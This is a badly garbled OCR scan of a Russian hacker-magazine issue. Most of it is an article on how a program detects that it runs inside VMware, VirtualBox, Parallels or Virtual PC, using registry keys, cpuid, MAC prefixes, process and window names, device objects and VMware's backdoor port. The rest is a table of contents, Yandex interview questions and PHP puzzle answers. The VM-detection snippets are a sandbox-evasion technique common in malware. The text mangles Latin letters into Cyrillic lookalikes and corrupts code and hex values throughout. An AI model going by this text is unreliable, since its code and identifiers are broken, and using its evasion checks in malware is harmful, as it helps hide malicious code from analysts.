РгосІ_ѴМиаге_ѴігЬиа1 для ѴМыаге Шогкзѣа'Ьіоп 

Самый простой способ узнать наименование жесткого 
диска — прочитать значение ключа с именем «О» в ветке ре- 
естра НКІМ\НАВ0Ѵ\/АВЕ\8Ѵ5ТЕМ\СиггепЮоп1:гоІ5еІ\5егѵісе5\ 
□ізк\Епит. 

В этом месте перечисляются все дисковые накопители в си- 
стеме, и первым, как раз в ключе с именем «О», будет тот диск, 
с которого произошла загрузка системы. 
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тектим виртуалки 



Редактор реестра 
Файл Правка Вид 

А тс 

С> '-.і . ОЬср 
>. сіігсасНе 
л , 0г5к 

1 - ^ Ёпипл 
> ■ ^ 0г»5сасЬе 
і сіоіЗбѵс 
0Р5 
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к ОХСКгЫ 
ЕІОбО 
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еЫгѵ 

М ЕР5 
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еК5сИес1 
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ЕггОеѵ 
Е5ЕГМТ 
еѵепііод 
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Избранное Справка 
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к 



іь 
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іь 



ІІГ 



Имя Тип 

|(По умолчанию) І ВЕ6 ,52 



Значение 

(значение не присвоено) 



аЬ \0 



•ш- 

.по] 
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СоипГ 



ВЕ<5_52 

тагототтсг 



пі МехУпйапсе 



ВЕС ШОР 0 



ЮЕ\0і 5 к Ѵ8 ОХ_Н АЯ00І5К_ 

тшшшгго 

0x00000001 (1) 



И 



Ком п ьютер\ Н КЕ У_1 ОС А 1_М АС Н ІЫ Е\$У 5Т ЕМ\С и г г е пІіСо піго! &е гѵіс е е\ 0 і 5 к , Е л и т 



Как читать реестр, я думаю, ты знаешь. Используем сначала Идентификатор жест- 
АРІ НедОрепКеуЕх для открытия нужного ключа, далее с помо- кого диска ѴігіиаіВох 
щью ПедОиегуѴаІиеЕх читаем значение. Выглядеть это должно в реестре 
примерно вот так: 



К Е Ѵ_(2У Е К Ѵ_ѴА ЩЕ л &гКеу) == ЕКК0К_51ІССЕ55) { 
Ке§СІ05еКеу(гКеуХ; 

// Мы под Ѵігбиаі РС 

гебигп бгие; 

} 



Идентификатор процессора определяется с помощью 
команды сриісі. Благодаря ей можно получить много всякой 
полезной информации об установленном процессоре. Вид 
выдаваемой этой командой информации зависит от содержи- 
мого регистра ЕАХ. Результат работы команды записывается 
в регистры ЕВХ, ЕСХ и ЕОХ. Подробно про эту команду можно 
почитать в любой книге по программированию на ассембле- 
ре. Для наших целей мы будем использовать эту инструкцию, 
предварительно положив в регистр ЕАХ значение 0x40000000: 



* • * 

_азт 

.{_! 

т оѵ еаx ^ 0x40000000 
ери ісі 

тоѵ І Р 1 , еЬх 
Лоу_ Ю_2 Л есх 
тоѵ I^_3^ ебх 

} 



// Открываем нужный ключ реестра 

КерОрепКеѵЕхА(НКЕУ 1_ОСАІ_ МАСНШЕ ■ ’'НАКРЫАКЕ\\^ 
5У5ТЕМ\\Сиггеп~ЕСоп1:го15е1:\\5егѵісе5\\РІ5к \\+-« 
Епцщ" . 0 д КЕУ_0УЕКУ_ѴАЩЕд &гКеу); 



// Читаем значение 

Ке§0иегуѴа1иеЕхА(_гКеуд “ 0 " , МШУ. &Туре ,<-і 
(ІРВУТЕ)КееКеу, &Ке§Ра1:Ь); 



// Закрываем все, что открыли ранее 

КееСІ05еКеу(гКеу) ; 



Далее все просто — используем зТгзТг для поиска нужных 
нам строк в считанном значении и, в зависимости от результата 
сравнения, делаем вывод. 

Версия ВІ05 содержится в ключе 'ЗузІетРгобисШате’ 
в ветке НКІМ\НАПОѴѴАВЕ\ОЕ5СПІРТЮН\Зуз1:ет\ВІ05. К при- 
меру, для ѴМѵѵаге там будет лежать строка «ѴМѵѵаге ѴігШаІ 
РІаІТогт», адля ѴігШаІВох — «ѴВОХ-1». Прочитать это все можно 
с помощью все тех же АРІ — ВедОрепКеуЕх и ПедОиегуѴаІиеЕх. 

Данные о видеоадаптере можно подглядеть в НК1_М\ 
8у5Іет\СаггепіСопігоІЗег\Елит\РСІ. В этой ветке перечисле- 
но все, что подключено к шине РСІ, в том числе и видеокарта. 
Для ѴігШаІ РС это строчка вида ѴЕМ_5333&РЕѴ_8811 &ЗІІВ8У 
З ОООООООО&ВЕѴ ОО, которая определяет видеоадаптер 33 
Тгіо 32/64, эмулируемый виртуалкой от МісгозоТІ — - на реаль- 
ном железе такое оборудование нынче днем с огнем не сы- 
скать {а у меня такая была в конце прошлого века. — Прим, 
ред.). Для ѴігШаІВох видеокарта описана последователь- 
ностью ѴЕЫ_80ЕЕ&ОЕѴ_ВЕЕР&ЗиВЗУЗ_00000000&ВЕѴ_00, 
что расшифровывается как «ѴігШаІВох Оізріау», а у РагаІІеІз 
ѴѴогкзіайоп — строка ѴЕМ_1АВ8&ОЕѴ_4005&ЗІІВ5ѴЗ_04001АВ8 
&ВЕѴ 00 определяет видеоадаптер «РагаІІеІз Різріау». 

Помимо этого, в ѴігШаІВох можно найти строку 
ѴЕМ_80ЕЕ&ОЕѴ_САРЕ&51ІВЗУ5_00000000&ВЕѴ_00, определя- 
ющую некий «ѴігШаІВох Оеѵісе», а у РагаІІеІз ѴѴогкзІаІіоп строки 
ѴЕІЧ_1 АВ8&ОЕѴ_4000&ЗиВЗУЗ_04001 АВ8&РІЕѴ_00 и ѴЕІѵМ АВ8& 
□ЕѴ_4006&ЗиВ5У5_04061 АВ8&РІЕѴ 00, определяющие «РагаІІеІз 
Тооіз Оеѵісе» и «РагаІІеІз Метогу СолІгоІІег» соответственно. 

Алгоритм действий следующий: пытаемся открыть нуж- 
ный нам ключ, и если он открывается успешно, то оборудова- 
ние, описанное этим ключом, в наличии и можно делать вывод 
о присутствии какой-либо виртуальной машины: 



і^іВе§ОрепКеуЕх(НКЕУ_ІОСАІ_МАСНІМЕ л ^ 

і_"5У5ТЕИ\\Сиггеп'ЕСоп1:го15е1:\\Епит\\РСІ \\ч-‘ 

УЕМ_5333&РЕУ_88.11&5иВ5У5_00000000&КЕУ_00Г,0^ 



После выполнения этого кода на ѴМѵѵаге ѴѴогкзІаІіоп в пере- 
менных Ю_1, Ю_2 и Ю_3 будут записаны значения 0x61774656, 
0x46566572 и 0x65726177 соответственно (в символьном пред- 
ставлении это не что иное, как «ѴМѵѵагеѴМѵѵаге»), на ѴИиаІВох 
в Ю_1 и в Ю_2 будет лежать значение 0x00000340, а на РагаІІеІз 
ѴѴогкзіабоп в Ю_1 0х70726с20, в Ю_2 — 0x68797065 и в Ю_3 — 
0x72762020 (что соответствует строке «ргі Иурегѵ»). 

Использование МАС-адреса для идентификации произ- 
водителя сетевой карты, конечно, не самый надежный спо- 
соб (ибо МАС-адрес довольно-таки просто поменять), но тем 
не менее его вполне можно применить для детекта виртуальных 
машин в качестве дополнительной проверки. 

Ты наверняка знаешь, что первые три байта МАС-адреса 
сетевой карты определяют ее производителя. Производители 
виртуальных машин в этом плане не исключение: 

ѴМѵѵаге (ѴМиаге Ыогкзѣабіоп) 

00:05:69 

Версия ВЮ8 РагаІІеІз Ѳ0:0с:29 

ѴѴогкзіаІіоп в реестре 00^1 с : 14 



Редактор реестр а 

Файл Пфавка Вид Избранное Справка 




л Компьютер 


Имя 


Тип 


Значение 


, Н КЕѴ_С І_Аі5 Е 5_К.О ОТ 
нкЕѴ_сиккшт_и5ЕК 
л . НКЕѴ_ШСАС_МАСН[ЫЕ 

ь | всооооооооо 

Ш I НАЙОѴѴАКЕ 
Г>-1. АСРІ 
^ И5СИРТТОМ 

* [ ^ 5у*1еіч| 

|ь СепФеІРгске&І 


іПо умолчанию) 

.?№ ВооіАгсЫііесІиге 
«'і'ё СараЬіІЕІіеь 
по С отр опа пТ Іп^опп а'Ёіо п 
но СопГідигаі:іоп Уаіа 


Р.ЕС_^ 

НЕ6_ОѴ/ОРО 

ЯЕС_ЕШОГЮ 

КЕС_ВІМАРѴ 


[значение не присвоено) 

0x00000003 Р) 

0x00000405 (1025) 

00 00 ОО 0000 00 00 00 0000 00 0000 ОООООО 
па КП 1Т«00 00 0000 02 00 00 ОО 05 00 00 оо.„ 


аЬ ;іс(еп1^іег 
««'о РгеІеггесіРгоІіІ« 


ЯЕО^ОѴѴОЯО 


АТ/ АТ СОМРАПЕЕЕ 
0x00000000 (0) 


■* ь $ѵ&іет6ю5&віе 


том 


10/26/07 


аЬ ] 




РЙІЛ -1 


РІоабпдРоіпб 
МиШ^ипс^юп 
• 1: ѴібеоАгіарІіЕГІ 


ѴібеоВюзѴегзіоп 


иЕс_мит_к 


РагаІІеІЕ(Я) ѴСА-СотрэІіЫе ВЮ5 Ѵегзтп 3.02111... 


1 1>-і 0ЕѴ1СЕМАР 

: ИЕ50УКСЕМАР 








( * 5АМ 

! і 5ЕСУШѴ 

1. , 

1 і $Ѵ5ТЕМ 








І НКЕУ„У$ЕК5 








і нкЕѵ_сийКЕт_сошб 

* тгг | * 









Ком п ь к>тер\ Н КЕѴ_1_ О С АЦ> 1 АС НІМЕ . НАР.0ѴѴ АРЕ'-, 0 Е5СДІРТЮМ\ 5у 5І:ет 




нации производителя сетев 
довольно ненадежный спосо 



идентифи- 



каоты 






Ма/іѵаге 



ХАКЕР 07/174/2013 



.. ѴѴіпОЫ ■ %5ІпіегпаІз; ллѵѵліуБІп^етаІз.сот 
РІІе Ѵіеѵѵ Неір 




ъ \ 



АгсМате 

ВгзеМатесЮ^есТз 
СаІІЬаск 
Оеѵісе 
, . Огіѵег 
І РіІе5уйетп 
^ СЮВА177 
| Ксгп«І0Ь]есі5 
, КптѵлОНк 
^ КпошгЮіібЗІ 

і ОЬ^есСТурв 
| КРС СоггёгоІ 
$. ^есиніу 
^ёіеюгіі 

4_ иМСРСоттипЕсаІюлРогІЕ 
4» ѴѴіпсіоѵѵе 

і ѴѴіпсІоѵѵБіаііспз 



и 



ІР| ѴЫМдгСопІгЫ 
35 Ѵо[ите{а№95с44 - а51 - . 
РІ Ѵокітй[эВД5с45-э51.., 



5утЬоІісІтк 

5утЬЫісІіпк 

5утЬо!ісІіпк 



\ □ € ■. і с е \ V с I М д гС о л \ го I 
\0г/ісе\На«ісІЁ5кѴоІит^ 
\ 0 еѵ і с е \ Н а гсі сі і % кѴоІ ит , „ 



ТПЁ / 


Туре 


Зугпііпк 


— 

Л- 


5 с 5Й): 


5угпЬоІіісІтк 


\ Реѵі сеМгі е\Н еР о гЮ 




5оі1: 


5утЬоІісУпк 


\ 0 еѵ і се\Іс! еМс! еР о ПІ 




Ѣст2: 


5утЬоІісІтк 


\ 0 еѵ і сеМб сі сі еР о гі2 




Іессігс 


5утЬоІіс1_тк 


'.Оеѵісе'Лесіігѵ 




ЗРОеѵісе 


ЗутЬоІісЦіпк 


\ 0 еѵ і с е і5Р0еѵЁсе 




5з1р0гѵ 


БугпЬоІісІтк 


V 0 е 1 .'! с е\ &5ІрОгѵ 




5ТОРАСЕ#ѴоІите^{а . 


^/гпЬоІісІтк 


'■ I ^е , ѵісе' , '' НагсІбІ5ІсѴіОІит... 




5ТОКАСЕ5гѴоІите^{а ... 


5утЬоІісІіпк 


\ 0 еѵ і се \ Н а гсі сі і 5 к Ѵоі цт . . . 




Тер 


5утЬо(кІ_іпк 


\0еѵ»се\Т ср 




имв*имв#і&84т.. 


5утЬоІісІіпк 


\І)еѵісе\0000004Ь 




имс 


5утЬоІісІіпк 


\0еѵісе\Мор 




У5Б^НООТ_ИиВ#4&..- 


5утЬоІісІі[Лк 


ѴОеѵісеМіБВРОО-О 




У^е=ѴЮ ЙОЕЕ&РЮ 0... 


^утЬоІісІіпк 


\0еѵ \ ее\,и 5-ВР СО -1 




/Вохйиезі 


ЗуппЬоІісІтк 


ѵО еѵ і с е\ V В охО и сзТ 


. 


ѵеохМіпіКсігОМ 


5утЬоІіс1тк 


ѵ 0 еѵ і с е \ ѴВ охМ і п і Нс! г 






ЗущІ^оіісГіпк 


ііеѵт с е 1 * . (кклчи.! 





\ С Ю В АІ ?7\Кс оі#М5_РРР О Е М I МІР О КТ ^ОООО^І са сВ8484 * 751 5 • 4 сОЗ *82 еб - 7 1 а8 7 а Ь ас361 ] 



Ѳ0 : 501.56 «Подозрительные» 

объекты в ѴігіиаІВох 

МісгобоЦ (Ѵігіиа і РС) 

00 : 0 Зііі 

00:0(1: За 
00 : 501 12 
7с : 1е: 52 
00:12:5а 
00: 15: 5сІ 
00: 17: -Ра 
28 : 18 :78 
7 с :есІ:8 сі 
00: 1сІ:с18 
00:22.: 48 
00 :25: а е 

60:45: Ьсі ПѴО 

Рс і Ь4 :_с4 

На диске лежат исходни- 

Ога сіе (ѴігіиаІВох) ки функций, реализу- 

08:00: 20 ющие все описанные 

в статье способы детекта 

РагаІІеІз (РагаІІеІБ Іліогкзіаііоп) виртуальных машин, 

00: 1с : 42 




ВСПОМОГАТЕЛЬНЫЕ ПРОЦЕССЫ, ОКНА И ДРУГИЕ 
«ПОДОЗРИТЕЛЬНЫЕ» ОБЪЕКТЫ 

Для нормальной работы практически все виртуальные машины 
требуют установки дополнений к гостевой операционной си- 
стеме, например ѴВохѲиезГАсІсІіІіоп для ѴііТиаІВох или РагаІІеІз 
Тооіз для РагаІІеІз ѴѴогкзШІіоп. Без этих дополнений работа 
с виртуальной машиной несколько затруднительна (ни тебе 
нормального разрешения экрана и полноэкранного режима, 
ни взаимодействия с ЫЗВ-девайсами, ни нормальной настрой- 
ки сетевых подключений). В общем, все производители вир- 
туалок не рекомендуют использовать их без этих дополнений. 
А эти самые дополнения оставляют очень заметный след в виде 
запущенных процессов: 



* ѴігіиаІВох 

■ ѴВохТгау.ехе 

■ ѴВохЗегѵісе.ехе 
■ ѴіПиаІ РС 

* ѵтизгѵс.ехе 

■ ѵтзгѵс.ехе 



■ РагаІІеІз ѴѴогкзГаГіоп 

■ ргісс.ехе 

• ргИооІз.ехе 

■ ЗбагесІІпТАрр.ехе 
* ѴМѵѵаге ѴѴогкзТаІіоп 

■ ѵтіооізб.ехе 



Для поиска процесса по имени мы воспользуемся функци- 
ями СгеаІеТооІіпеІр323парзІіо1:, Ргосезз32РігзІ и Ргосезз32МехІ: 



#іпс1исІе <ТІКе1 р 32. б> 



// К примеру, ищем процесс ѵт1ооІ5СІ . ехе 

ѵ.сіаі ■: УМшагеРгосе5 51Магое[] = {1 І 'ѵтіооІ5СІ .ехе'*}; 

РК0 СЕ55ЕІМТКУ32 ре; 

НАШ1.Е ЬБпарБИоІ.; 

Н5пар5Ііо1 - СгеаіеТоо1Ие1р325парзІіо1 

(ТН 32С5 5МАРРК0С Е55 . Ѳ 

ІегоМетогу Г&ре . 5І2ес-р( РК0СЕ55ЕМТКУ32ІлП ) : 

ре . сЫБіге - зІ2еоР( РК0СЕ55ЕІ\ІТКУ32ІлП ; 

Р грее $ $ 3 2РІГЗ 1 ( Ь5пар51по1 , &ре) ; 



{ 

ІР (шетсшр(ре. згЕхеРИе . УМ1л/агеРгосе551\1ате л <-■ 

24) -- Ѳ) геіигп Ігие; / / Мы под ѴМмаге 



(Ргосе5532Мех1(|і5пар5І'іо1, > &ре) ); 



Вытащить эти первые три байта из МАС-адреса нам помо- 
жет АРІ -функция СеГАсІарТегзІпТо: 

// Подключаем либу, в которой содержится нужная 
// нам функция 

#і пс Іи сі е <ірН1рарі ,Ь> 

#рга§та соттепЦІіЬ,, " ІРНСРАРІ . ІіЬ" ) 

. . . Открытые окна для 

ѴМѵѵаге (красным 

// Определяем размер буфера под данные. выделено окно 

// возвращаемые функцией классаѴМ5шіісН- 

Се1А(1ар1ег5ІпРр(Асіар!егІпРо л &0и1Ви11.еп)^ іізегСопГгоіСіазз) 



Помимо непосредственно самих процессов, демаскирую- 
щим признаком могут стать окна, открытые этими процессами. 
Окон в каждой из рассматриваемых виртуальных машин может 
быть довольно много, и все их мы перечислять не будем, а огра- 
ничимся одним или двумя. 

Итак: 

ѴігіиаІВох 

ѴВохТ гауТооІкіпсІСІазз 

РагаІІеІз Іліогкзіаііоп 

СРІпІегсерІог 



// Выделяем память под данные об адаптере 

Асіаріегіпіо = (РІРАРАРТЕКІІМРСО «-■ 

дші^ІтагІОиІВиІІеп ]Д; 



// Получаем информацию об адаптере 

Се1А^ар1ег5Іп1о(АсІар1егІп-Ро :( &0и1Ви-Р!.еп Д; 



// Сравниваем первые три байта МАС-адреса 
// с 00:1с:42 (РагаІІеІз Іліогкзіаііоп) 



11_С((ВУТЕ)Ас1ар1ег1п1о->Ас1с1ге55[0] == 0x00) ^ 

((ВУТЕ)АсІар1егІп1о->АсІсІге5Б[1] .=- 0x1с) 

( (ВУТЕ)Ас1ар1ег1п1о->Ас1с1гезз[2] == 0x42)) { 

сIе1е1е( АсIаріе^Iп-Ро , ) : 

// Иы под РагаІІеІз кіогкзіаііоп 

геіигп Ігие: 

}• е 1 з е { 

сІеіеі:е( АсІар1егІп1о) ; 

геіигп Іаізе: 

} 
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Детектим виртуалки 



93 



В ѴМшге ІѴогШаІіоп для взаимодействия 
гостевой и основной операционных систем 
реализован небольшой бэкдор в виде порта 
с номером 0x5658 



Ре5кѣорІІ±і1іѣе5 
ѴігЕиаІ РС 

{ 0843 РО 01 - 1 О 28 - 44 аЗ^В 11 О-ЕЗА 93 А 85 ЕА 96 } 

ѴМиаге Ыогк5Іа1:іоп 

ѴМ 5 іл/ іі с Рі I) 5 е г СоітЬ го 1 Сіа 5 з 



Найти окно по имени класса очень просто — для этого есть 
функция РіпсМ/іпсіоѵѵ: 



(_і К примеру, ищем окно для УМыаге 

НілІШ ѴМіл/агеЫіпсІом ~_РіпсШіпсіоиА <-> 

( " ѴМБ^іѣсИЦ ве гСопѣгоІСІа зБ" , ШИ) ; 



і-р(ѴМыагеМіп6оц != N1111) геѣит іігие; // Мы под 
// ѴМыаге Іліогкзііаіііоп 



ВОЗМОЖНОСТИ, ЗАЛОЖЕННЫЕ ПРОИЗВОДИТЕЛЕМ 

Некоторые производители (в частности, ѴМѵѵаге и МісгозоИ) 
специально реализуют возможности управления своими про- 
дуктами, которые можно использовать для наших целей. 

В Ѵігіиаі РС используются инвалидные (не «инвалидные», 
а «альтернативно одаренные». И вообще-то они «недействи- 
тельные». — Прим, ред.) команды процессора с опкодами ОхОР, 
ОхЗР, 0x07 и 0x0В, попытка выполнения которых на реальном 
процессоре вызовет исключение, в то время как на Ѵігіиаі РС 
все пройдет нормально. С помощью этих команд можно доста- 
точно просто задетектить виртуалку от Місгозой: 



•Егѵ -Г 

Э5ГП { 

хо г еЬх л еЬх 

тоѵ еах,, 1 

еті 1 і( 0 х 0 Р) 

еті 1 і( 0 хЗР) 

еті 1 :( 0 х 07 ) 

еті 1 :( 0 х 0 В) 

- 1 

геііигп Іігие; // Мы под Ѵігііиаі Р С 

} 



ехсер 1 :(ЕХСЕРТІОМ ЕХЕСШЕ НАШ 1 .ЕВ) геііигп ТаЬ ; 



Помимо процессов и окон, указывающих на наличие ВМ, 
можно найти и другие «подозрительные» объекты — например, 
если покопаться в гостевой ОС виртуальной машины утилитой 
ѴѴіпОЬі или какой-нибудь аналогичной, то можно найти вот та- 
кие объекты: 

ѴігЬиаІВох 

\^еѵісе\VВоxМіпіК6^^N 

\Реѵісе\ѴВохСие 5 І: 

Рагаііеіз ЫогкБІаІііоп 
\Реѵісе\рг 1 _рѵ 
\Реѵісе\рг 1 _ѣё 
\Реѵісе\ рг 1 ~ 1 іте 
\Реѵісе\Рг 1 МетРеѵ 

\Реѵісе\Рг 1 МетРеѵРсі 

\Реѵісе\Рг 1 МетРеѵ 

Ѵіг±иа1 РС 

\Реѵісе\Ѵіг 1 :иа 1 МасІііпе 5 егѵісез 




ѵѵ\ѵ\ѵ 

ЬІі.іу/дІШХІі -оченьхо- 
рошая статья про детект 
виртуалок. Единствен- 
ный ее недостаток - она 
на английском языке. 



Проверить наличие «подозрительного» объекта совсем 
несложно, достаточно попытаться открыть его с помощью 
СгеаІеРіІе: 



В ѴМѵѵаге ѴѴогкзІаІіоп для взаимодействия гостевой и ос- 
новной ОС реализован небольшой бэкдор в виде порта с но- 
мером 0x5658. Для его использования необходимо в ЕАХ 
положить «магическое» число 0x56465868 {в символьном 
представлении — «ѴМХИ»), а в ЕСХ записать одну из команд 
взаимодействия гостевой и основной ОС {например, команда 
ОхОА возвращает версию установленной ѴМѵѵаге ѴѴогкзШІіоп). 
Короче, выглядит все это приблизительно так: 



•Егу { 

азт { 

тоѵ еах, 0 x 56465868 

т оѵ есx^ 0 x 0 А 

тоѵ^есіх., 0 x 5658 

іп еах., 6 х 



геііигп Іігие; // Мы под ѴМыаге 

} 



ехсерКЕХСЕРТІОІЧ ЕХЕСШЕ НАШ 1 .ЕВ) геііигп г. і ' : 



// К примеру, проверяем ѴігІіиаІВох 

ІР { (Сгеа1:еРі1е(1.’ І \\\\.\\ѴВохМіпіКсІгРМ" . 0, 0 „ +-■ 
0, ОРЕІ^ЕХІЗТІШ., 0 Л 0)_!_= ІМѴАИО_НАШІЕ_ѴАШЕ>^ 
| | (Сгеа~ЕеРі1е(1_" \\\ \ . \\ѴВох6ие5І:" , 0, 0, 0 . <-> 
ОРЕІЧ_ЕХІ5ТШ5, 0., 0) 1=ІМѴАИР НАШІ-Е ѴАШЕ)) ^ 

геііигп Іігие; // Мы под Ѵіг'ЕиаІВох 



ЧТО ЕЩЕ «ПОДОЗРИТЕЛЬНОГО» 

МОЖНО НАЙТИ В РЕЕСТРЕ? 

Помимо признаков наличия специфического оборудования, 
в реестре можно увидеть и другие следы, оставляемые вир- 
туальными машинами. Некоторые из них базируются в ветке 
НКЕМ\НАП0ѴѴАРіЕ\АСРІ\050Т. Достаточно в этом месте прове- 
рить наличие таких вот ключей: 

• ѴИиаіВох * Ѵігіиаі РС 

• ѴВОХ_ • АМіВІ 

* Рагаііеіз ѴѴогкзІаІіоп * ѴМѵѵаге ѴУогкзІаІіоп 

■ РРИ5 • РТІЛТ) 



Проверку реализуем так же, как мы проверяли наличие 
определенного оборудования. Просто делаем попытку от- 
крыть нужный нам ключ и, в случае успеха, делаем вывод о на- 
личии ВМ. 



ЗАКЛЮЧЕНИЕ 

Как видишь, признаков, характерных для виртуальных машин, 
Ключ РВЬ5_ в реестре предостаточно, и для того, чтобы их увидеть, сильно глубоко ко- 

РагаІІеІнѴѴогкзіаііоп пать совсем не нужно. И-С 







ПУБЛИЧНАЯ ПОРКА 
ПИНГВИНА 



Недавно случилась довольно неприятная исто- 
рия с О-сІау-уязвимостью, всплывшей сразу во 
всех версиях ядра І_іпих, выпущенных за послед- 
ние три года. В связи с этим мы проанализиро- 
вали все самые серьезные и опасные уязвимо- 
сти в Ыпих за последнее время. Причем в обзор 
попали дыры не только в ядре, но и в других под- 
системах, включая дІіЬс, X- сер вер и не только. 





II N1X010 




и N1x01 о 




КОДИНГ 




кодинг 




ОГНЕННЫЙ ЗАНАВЕС 

ІрШЫез остается одним из самых мощных 
и важных инструментов безопасности в І_іпих- 
системах. Давай поговорим о некоторых его 
возможностях. 



КУШАТЬ ПОДАНО! 

Веб-проекты становятся все функциональнее 
и сложнее, а значит, усложняется и процесс их 
разработки. Для того чтобы сделать работу с па- 
кетами проще, были придуманы специальные 
системы сборки — вроде Сгипі 



АІІС.Ш.АГМ8: ФРЕЙМВОРК, 

КОТОРЫЙ НАМ НРАИЦА 

И снова иЗ-фреймворки. На этот раз изучим 
детище Соодіе. Благодаря простоте использова- 
ния этот продукт может заставить тебя взглянуть 
на разработку на из совсем иначе. 



КОДИНГ 






ПРАВИЛЬНАЯ МНОГОПОТОЧНОСТЬ 

Если ты хочешь добиться от своего приложения 
высокой производительности, асинхронное про- 
граммирование — твой выбор. Давай посмо- 
трим, как это делается. 



БУБЕН НА ПРОКАЧКУ 

Представляем твоему вниманию новый подход 
к привычным и хорошо изученным инструментам 
в арсенале администраторов систем под управ- 
лением *піх. 



СПОСОБНЫЕ ПОДМАСТЕРЬЯ 

Обзор самых полезных плагинов, аддонов 
и инструментов для популярных МуЗОЦ №діоз 
и Зпогі, добавляющих в привычные продукты 
интересный функционал. 








с 
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Александр Лозовский 

І020У5кѵ@д1с.т 







СП ЕЦПОДГОН : ЗАДАЧ И ОТ ЯНДЕКСА 
(СПОЙЛЕР:ѴАНОЕХ.ІШ,ѴА.ІШ) 

Если ты думаешь, что админы голландской ком- 
пании «Яндекс» только и делают, что получают 
миллионные зарплаты и посещают квартал крас- 
ных фонарей и кофешопы, то ты таки неправ. 
Прослушай информацию из первых рук! 

В Яндексе системные администраторы об- 
ладают достаточно широким кругозором, так 
как им приходится заниматься архитектурой по- 
стоянно растущих по нагрузке сервисов, искать 
проблемы, автоматизировать свою работу, на- 
страивать различные приложения и решать ряд 
других не менее интересных задач. 

На собеседованиях мы спрашиваем достаточ- 
но много всего, чтобы понять, в каких вопросах 
кандидат силен, и определить, в какой области 
ему будет интереснее работать. Если ты придешь 
к нам на собеседование, то надо быть готовым 
к тому, что тебя спросят про ТСР/ІР и вообще 
про различные сетевые технологии, про устрой- 
ство операционной системы ІІМІХ, про твой опыт 
программирования на различных скриптовых 
языках, про веб-серверы, базы данных и другие 
приложения. Также могут предложить спроекти- 
ровать небольшой отказоустойчивый и масшта- 
бируемый сервис, например сервис по отдаче 
множества статических картинок. 



Ниже — несколько задач, которые мы обычно 
задаем. 

1 . Классический вопрос: что такое НАШ 10 
и РАЮ 0+1? 

Обычно мы спрашиваем, в чем разница, какой 
из них лучше и почему. 

2. Вопрос про сети. 

Два приложения в разных дата-центрах обмени- 
вались данными по протоколу прикладного уров- 
ня, использующему в качестве транспорта про- 
токол ТСР по выделенному каналу с пропускной 
способностью ЮС. Природа приложения такова, 
что данные сначала накапливаются в большом ко- 
личестве, а потом прикладным уровнем переда- 
ются с максимальной интенсивностью. При этом 
максимальная наблюдаемая скорость передачи 
данных между ними не превышала 200 килобайт 
в секунду. После перемещения серверов, на кото- 
рых работают эти приложения, в один дата-центр 
скорость передачи данных возросла на поряд- 
ки. Предложите объяснения этому наблюдению. 
Что можно было бы предложить для исправления 
ситуации до переезда серверов? 

3. Протокол НТТРЗ сейчас получает все 
большее распространение и популярность. 



Вот типичный вопрос про сертификаты. 

На 1 .2.3.4: 443 по протоколу НТТРЗ отвечают: 

• ТогЬаіѵЦ; 

• Юо.ес; 

• Ьаг.ад. 

Сколько должно быть сертификатов для этих 
веб-сайтов и что должно в них быть прописано со- 
гласно НРС, чтобы браузеры могли им доверять? 

4. Совсем простой вопрос про ЬавН: как ин- 
крементировать {увеличить на единицу) 
переменную «а» в ЬазИ? 

5. Какая утилита позволяет узнать 
названия библиотечных функций, 
используемых программой 

в процессе исполнения? 

6. Ну и наконец, классический вопрос, 
который любим не только мы: расскажите, 
как происходит процесс загрузки Упих 

от включения компьютера. 

Просим рассказать про стадии загрузчика на х86, 
что такое іпіі, как он создается и зачем он нужен, 
про ирзІагѴзузЮтсІ - ■ какие у них принципы ра- 
боты и в чем их преимущества перед обычными 
іпіі-скриптами. 
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ОТВЕТЫ НА ЗАПАНИ ОТ ЗОРТШЕ ИЗ ПРОШЛОГО НОМЕРА 



1 . ЧТО ВЫВЕДЕТ СЛЕДУЮЩИЙ СКРИПТ 
И ПОЧЕМУ? 



< ?рЬр 



$5Ѵаг1 = ’ 
$5Ѵаг2 = ’ 
$5ѴагЗ = ’ 


'Неііо., могІсП"; 

1 н « 

л 

1 II , 

д 


4 


ШПСЕІ 


Іоп ^ооіП 


{ 


н] 


ЮЬа] 


ІбѴэгі. $5Ѵаг2; 


$зѴаг2 = &$5Ѵаг1; 


> 




"1 


ипсііоп -Роо2() 


{ 


еіоЬа] 


ІзѴагІ; 


} 


$СЮВАІ-5[ "5ѴагЗ" ] = &$5Ѵаг1; 



■РооіП ; 




есИо "5Ѵаг2 = 


' $5Ѵаг2 ' \п' , ^ 


■Роо2(); 




есИо "зѴагЗ = 


’$5ѴагЗ’\п"і 


?> 





ОТВЕТ 

зѴаг2 - " 

зѴагЗ = 'Неііо, \л/огІсі!' 

Объяснение: на самом деле в локальных про- 
странствах имен все переменные, объявленные 
как діобаі, являются ссылками на элементы су- 
перглобального массива $ОІ_ОВАІ_3['ѵагіаЫе_ 
пате']. А при присвоении этим ссылкам других 
ссылок связь с суперглобальным массивом теря- 
ется. 

2. ЧЕМУ БУДЕТ РАВНО ЗНАЧЕНИЕ ПЕРЕ- 
МЕННОЙ $А? 

УСЛОВИЕ 

а) $а =. (ІПѢ) ( (0 . 1+0.7) * Уд 



б) $а = 90; 

$э += ++$а; 



а) 7 

Объяснение: рациональные числа, которые мо- 
гут быть точно представлены в виде чисел с пла- 
вающей точкой с основанием 10, например, 0.1 
или 0.7, не имеют точного внутреннего представ- 
ления в качестве чисел с плавающей точкой с ос- 
нованием 2, вне зависимости от размера мантис- 
сы. Поэтому они и не могут быть преобразованы 
в их внутреннюю двоичную форму без небольшой 
потери точности. Соответственно, результат сло- 
жения вернет по сути 7,9999999999... При ум- 
ножении и приведении к целочисленному типу 
дробная часть отбросится. 



б) 182 

Объяснение: в момент присвоения переменной 
$а значения префиксный инкремент уже увеличит 
ее значение (согласно приоритетам операций). 
Соответственно, получится 91 + 91 = 182. 

3. ЧТО ВЫВЕДЕТ СЛЕДУЮЩИЙ КОД? 



< ірЬр 
$а = 



(1=>10, 2=>20 л 3=>30) ; 



$Ь = &$а[1] ; 



$ а[1] - $а[2]; 



$а[1] = &$а [ 3 Хі 
есИо $Ь; 



?> 



20 

Объяснение: при присвоении переменной, явля- 
ющейся ссылкой, значения другой ссылки, связь 
теряется. Переменная, на которую была ссылка 
до присвоения, останется при своем значении. 

4. КАКИМИ СПОСОБАМИ МОЖНО ПОЛУ- 
ЧИТЬ РОМ Б СРЕДСТВАМ И С83 И НТМІ? 



Рис. 1 . Ромб, который надо 
нарисовать 



Способ 1 : 

. гесѣа пеі е { 

місНІі : ІѲѲрх ; Неі аІтЕ : 10 Ѳрх ; 

Ьаск^гоипб ^#402022 ; 

